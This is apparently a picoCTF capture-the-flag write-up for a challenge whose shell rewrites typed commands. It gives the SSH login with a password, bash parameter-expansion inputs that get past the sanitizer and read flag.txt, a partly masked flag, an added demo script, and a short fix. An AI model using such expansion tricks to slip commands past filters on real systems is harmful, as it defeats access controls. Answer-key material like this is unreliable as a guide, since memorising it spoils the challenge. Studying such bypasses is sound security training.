Description
Special autocorrects every shell command, so you must abuse parameter expansion and braces to execute raw commands and leak the flag.
Setup
SSH to saturn.picoctf.net on port 56058 with the supplied password.
Experiment with bash parameter expansion to bypass the forced capitalization/rewriting and run arbitrary commands under the hood.
ssh -p 56058 ctf-player@saturn.picoctf.net
d8819d45
${parameter=ls blargh}
${parameter=cat < blargh/flag.txt}
Solution
- Step 1: Probe the sanitizer. Simple commands like ls or cat are rewritten, but parameter-expansion expressions remain untouched. Start with harmless testers such as ${parameter=ls}.
- Step 2: Chain the exploit. Navigate into blargh/ using sanitized cd, then use ${parameter=ls blargh} to list the directory and ${parameter=cat < blargh/flag.txt} to read the flag.
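Why the two expansions in the steps above behave as they do, as an added example that is not part of the original write-up or the challenge's code. It assumes the wrapper hands each line to a fresh shell (modelled with sh -c); the scratch directory, the flag text and the function names are constructed for the demonstration.

```shell
#!/bin/sh
# Added example. Scratch directory and flag text are constructed sample data.
demo_dir=$(mktemp -d)
trap 'rm -rf "$demo_dir"' EXIT
mkdir "$demo_dir/blargh"
printf 'constructed-sample-flag\n' > "$demo_dir/blargh/flag.txt"

# Assumption: the wrapper hands each line to a fresh shell, modelled here
# with `sh -c` in a clean environment. stderr is hidden to keep output short.
run_line() {
    ( cd "$demo_dir" && env -i PATH="$PATH" sh -c "$1" 2>/dev/null )
}

# Unset parameter: the default is assigned, expanded, then word-split, and
# the first resulting word is used as the command name.
list_via_expansion() {
    run_line '${parameter=ls blargh}'
}

# Redirections are recognised before expansion, so this "<" is a literal
# argument. cat fails on a file named "<" but still prints flag.txt.
read_via_expansion() {
    run_line '${parameter=cat < blargh/flag.txt}'
}

# Within one shell the assignment sticks: the second expansion reuses the
# first value, so a different name is needed for each new command there.
reuse_in_same_shell() {
    run_line '${parameter=echo first}; ${parameter=echo second}'
}

# Quoted, the expansion is not split: "ls blargh" is looked up as a single
# command name and fails with status 127 (command not found).
quoted_is_not_split() {
    run_line '"${parameter=ls blargh}"' || echo "exit=$?"
}

echo "list:   $(list_via_expansion)"
echo "read:   $(read_via_expansion)"
echo "reuse:  $(reuse_in_same_shell | tr '\n' ' ')"
echo "quoted: $(quoted_is_not_split)"
```

A filter that rewrites the typed text runs before the shell expands it, so it never sees the command name that word splitting produces. Executing a validated argument list directly, without passing the line to a shell, removes that gap.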
Flag
picoCTF{5p311ch3ck_15_7h3_w0...35}
Any creative use of ${parameter=...} (or similar expansion) that runs cat on blargh/flag.txt yields the answer.